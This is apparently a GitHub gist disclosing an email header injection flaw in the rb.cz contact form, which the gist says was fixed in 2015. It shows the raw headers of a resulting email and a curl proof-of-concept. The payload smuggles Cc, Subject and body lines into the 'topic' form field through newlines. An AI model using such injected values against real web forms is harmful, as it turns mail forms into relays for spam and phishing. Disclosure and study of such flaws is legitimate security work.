Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
rb.cz email injection (working until new website got deployed 2015-04-02, vulnerable since 2011 at least, reported at least in 2013, 2014)
Received: (qmail 23343 invoked by uid 1013); 31 Oct 2013 16:45:31 -0000
Received: from no-reply@rb.cz by smtp by uid 0 with qmail-scanner-1.22
( Clear:RC:0(62.168.6.253):.
Processed in 0.011431 secs); 31 Oct 2013 16:45:31 -0000
Received: from smtp2.rb.cz (62.168.6.253)
by smtp.example.com with SMTP; 31 Oct 2013 16:45:31 -0000
Received: from sv72-wwwjbo2-al-02 (unknown [172.18.8.181])
by smtp2.rb.cz (Postfix) with ESMTP id 2AF4D18038D
for <spam@example.com>; Thu, 31 Oct 2013 17:45:31 +0100 (CET)
From: no-reply@rb.cz
To: spam@example.com
Message-ID: <10904531.1051383237931149.JavaMail.jboss@172.18.0.139>
Subject: Email z formulare "Kontaktujte nas - lide" - foo
CC: spam@example.net
Subject: waldo
BODY
-----
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
=C3=9Adaje vypln=C4=9Bn=C3=A9 a odeslan=C3=A9 klientem z webov=C3=A9ho form=
ul=C3=A1=C5=99e.
Jm=C3=A9no a p=C5=99=C3=ADjmen=C3=AD: foo bar
Telefon:=20
E-mail: foo@example.com
T=C3=A9ma: foo
BODY
-----
Kontaktn=C3=AD pobo=C4=8Dka:=20
V=C3=A1=C5=A1 dotaz:
curl "http://www.rb.cz/views/pages/send-mail-contact-us/" \
--form "to=spam@example.com" \
--form "topic=foo
Cc:spam@example.net
Subject: waldo
BODY
-----" \
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment